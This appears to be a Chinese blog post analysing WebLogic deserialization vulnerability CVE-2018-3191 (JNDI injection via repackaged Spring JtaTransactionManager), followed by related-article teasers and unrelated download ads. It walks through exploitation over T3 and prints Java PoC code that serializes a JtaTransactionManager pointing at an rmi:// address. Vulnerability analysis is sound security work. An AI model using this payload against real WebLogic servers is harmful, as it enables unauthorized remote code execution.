果你的浏览器关闭了 java,weblogic之CVE-2018-3191漏洞分析

最新推荐文章于 2024-04-03 20:48:39 发布
最新推荐文章于 2024-04-03 20:48:39 发布
阅读量55 收藏
点赞数
文章标签: 果你的浏览器关闭了 java

weblogic之CVE-2018-3191漏洞分析

理解这个漏洞首先需要看这篇文章:https://www.cnblogs.com/afanti/p/10193169.html 引用廖新喜说的,说白的就是反序列化时lookup中的参数可控,导致 JNDI注入

AbstractPlatformTransactionManager这个黑名单就是用于防止Spring JNDI注入,从官方以前的黑名单上就能看到org.springframework.transaction.support.AbstractPlatformTransactionManager,但是官方没有想到在com.bea.core.repackaged的相关包还有spring的相关类。其实这两个包中的类实现几乎一样,只是来源于不同的包。

看下利用过程: 生成poc.

926c62fa1361e1551c6bad31a2a8928e.png 服务器开启jndi服务,ExportObject.java恶意类就是弹个计算器

872324e1867b446123ab64053e981928.png 通过T3协议发送数据包,服务器向jndi请求恶意类,反序列化导致RCE:

53e132c668d6c1551c6cf641008607b0.png 跟一下漏洞过程: 来到com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager类的initUserTransactionAndTransactionManager方法,this.userTransactionName属性被赋值为恶意rmi地址,跟进164行:

419468df7d894c67ef016e7d3d92e0db.png 跟进lookup方法

b26f1cae64479255529ea56b400cf689.png

d3d47f469eed060fee606457a85b97f4.png 最后看一下poc生成过程: 导入所用到的com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar包和com.bea.core.repackaged.apache.commons.logging_1.2.1.jar包,将UserTransactionName参数注入恶意类地址。

String test;

System.out.println("hahha");

test = "rmi://192.168.20.112:2222/aa";

JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();

jtaTransactionManager.setUserTransactionName(test);

File f = new File("E:\\Struts2-Vulenv-master\\ysoserial\\src\\main\\java\\ysoserial\\obj.txt");

ObjectOutputStream out1 = new ObjectOutputStream(new FileOutputStream(f));

out1.writeObject(jtaTransactionManager);

out1.flush();

out1.close();

55814e4163975701c537dc0b544e1e6e.png

weixin_39877898
关注
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)漏洞复现
weixin_48413667的博客
09-22 8094
一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882和CVE-2020-14883
weblogic权限绕过/远程命令执行漏洞复现(CVE-2020-14482、CVE-2020-14883)
LuckySec
12-03 7414
0x01 漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求
从防护角度看Weblogic反序列化历史漏洞
猪肉炖白菜
07-09 645
一、前言 Weblogic反序列化漏洞是一个经典的漏洞系列,根源在于Weblogic(及其他很多java服务器应用)在通信过程中传输数据对象,涉及到序列化和反序列化操作,如能找到某个类在反序列化过程中能执行某些奇怪的代码,就有可能通过控制这些代码达到RCE的效。随着每次补丁的修复,很多Weblogic反序列化的思路都被封禁了,但是跟Struts2系列漏洞不同的是,Weblogic漏洞由于涉及的面比较广,所以近几年还是持续有新出漏洞的,这也体现了挖掘出新漏洞的高手们对java语言理解之深。目前在做渗透测
weblogic t3 协议利用与防御
爱国小白帽
03-24 3051
weblogic t3 协议利用与防御 原创 360-CERT [360CERT](javascript:void(0)???? 4天前 报告编号:B6-2020-032001 报告来源:360-CERT 报告作者:Hu3sky 更新日期:2020-03-20 0x00 前置知识 weblogic t3协议指的是weblogic的rmi使用的t3协议,在java rmi中,默认rmi使用的是jrmp协...
weblogic CVE-2018-2628复现
Armandhe的博客
06-15 3009
无言
buuctf [WebLogic]CVE-2018-2894
qq_1873822的博客
03-26 741
漏洞描述 (CVE-2018-2894)Weblogic任意文件上传 Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。 Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。 利用条件:需要知道部署应用的web目录 https:/
vulhub-weblogic漏洞复现系列CVE-2017-10271、CVE-2018-2628、CVE-2018-2894
weixin_43071873的博客
11-20 1479
领导给了任务把vulhub里边的靶场都玩一玩。那就顺便做个系列发出来吧。 CVE-2017-10271 CVE-2018-2628 CVE-2018-2894 weak_password CVE-2014-4210(ssrf)因为vulhub的问题,redis一直启动不了,所以没复现出来。等以后更新一下vulhub之后如可以再补充。 CVE-2017-10271 1、漏洞详情: Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Securi
Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-31 1358
Weblogic受影响的版本:此次我们使用的是vnlhub靶场搭建的环境,是vnlhub中的Weblogic漏洞中的CVE-2018-2894靶场,我们 cd 到 CVE-2018-2894,然后输入以下命令启动靶场环境: 输入以下的命令可以查看当前启动的靶场环境: 我们首先通过以下的命令获取Weblogic后台登陆的用户名和密码 然后我们通过URL访问靶场界面然后我们通过用户名weblogic和刚刚获得密码QghFSif4登陆Weblogic后台界面如图,是我们登陆后的界面:登录到后台,我们按照登录 ->
weblogic漏洞复现】CVE-2017-10271+CVE-2020-14882远程命令执行漏洞+CVE-2018-2894任意文件上传漏洞+CVE-2018-2628反序列化远程代码执行漏洞
serendipity1130的博客
09-01 3846
1.CVE-2017-10271 漏洞成因: 由WebLogicServerWLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞 触发漏洞url如下: http://192.168.225.139:7001/wls-wsat/CoordinatorPortType post数据包,通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。 1.扫描到端口号为:7001,进行访问。 nmap192.168.225.138-sV-sC-P
漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2035
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现—CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
2401_83739434的博客
04-03 2606
环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。
WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)
做自己喜欢的事,并将其发挥到极致!
04-04 1914
文章目录前言一、漏洞概述二、影响版本三、环境搭建四、本地复现五、参考链接 前言 本篇文章仅记录漏洞复现过程,仅供参考,切勿用于非授权下的渗透攻击行为,出现任何后与本作者无关,切记! 一、漏洞概述 EJBTaglibDescriptor 在反序列化的同时会进行XML解析,通过重写EJBTaglibDescriptor中的writeExternal函数生成恶意的序列化数据。 二、影响版本 WebLogic 10.3.6 三、环境搭建 系统环境:Ubuntu 16.04 (192.168.242.129)
Weblogic权限绕过之CVE-2020-14882利用和源码分析
weixin_45682070的博客
03-25 6650
前言: 环境: 利用: 代码分析: 鉴权代码分析CVE-2020-14882是权限绕过漏洞,所以我们直接切入主题,找到鉴权的代码,在idea中双击shift,查找doSecuredExecute方法。 此方法存在于\middleware\wlserver\modules\com.oracle.weblogic.servlet.jar!\weblogic\servlet\internal\WebAppServletContext.classWebAppServletContext类,可以看到中间有个se
基于JavaScript和微信小程序的安心食疗小程序设计源码
09-23
该项目是基于JavaScript和微信小程序的安心食疗小程序设计源码,包含99个文件,其中17个JavaScript源文件、12个WXML页面布局文件、13个WXSS样式表文件、17个JSON配置文件、24个PNG图片文件和16个JPG图片文件。适用于健康饮食领域的小程序开发。
计算机四级网络选择题目
09-23
题目有些标的答案,有些没有,大部分是用通义千问参考加答的,不保证全部正确。
ASP源码:大家帮网精品装修招标门户网站程序网站源码,网站系统模板源码73.rar
最新发布
09-23
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(随意编程),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无VIP,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于整理和收集资料耗费时间的酬劳 3. 积分资源不提供使用问题指导/解答
vue3+springboot私家车位共享系统微信微信小程序[编号:CS_41791](1)源码数据库.zip
09-23
本文介绍了使用SpringBoot作为后端框架,Vue作为前端框架,MyBatis-Plus进行持久层开 。详细描述了系统测试的目的、功能测试案例,包括登录验证和用户管理,以及数据库设计。 前端:vue3 开发工具:IDEA 或者eclipse都支持 编程语言: java 框架:springboot/ssm都支持 jdk版本:jdk1.8以上均可 数据库: mysql 版本不限 数据库工具:Navicat/SQLyog都可以
基于C#的.NET通用后台角色权限管理系统设计源码
09-23
该项目是基于C#的.NET通用后台角色权限管理系统设计源码,包含337个文件,其中包括112个C#源文件、76个GIF图片文件、40个JavaScript脚本文件、33个Razor视图文件(.cshtml)、23个CSS样式表文件、15个配置文件(.config)、9个项目文件(.csproj)、4个TrueType字体文件(.ttf)、3个Embedded OpenType字体文件(.eot)、3个SVG矢量图形文件。该系统旨在为.NET平台提供灵活的角色权限管理解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值